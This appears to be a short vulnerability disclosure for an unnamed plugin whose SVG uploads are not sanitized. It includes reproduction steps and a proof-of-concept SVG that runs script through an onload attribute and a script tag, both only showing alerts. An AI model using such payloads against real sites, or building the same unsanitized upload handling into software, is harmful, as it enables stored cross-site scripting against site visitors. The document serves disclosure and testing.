The plugin does not sanitize SVG file contents, leading to a Cross-Site Scripting vulnerability.
1. Upload an SVG file with the following contents.
2. View the SVG file on the frontend and see the alerts.
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
onload="javascript:alert(/XSS/)"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:cc="http://creativecommons.org/ns#"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:svg="http://www.w3.org/2000/svg"
xmlns="http://www.w3.org/2000/svg"
xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
id="svg3013"
sodipodi:docname="download_font_awesome.svg">
<script>alert(/XSS2/)</script>
</svg>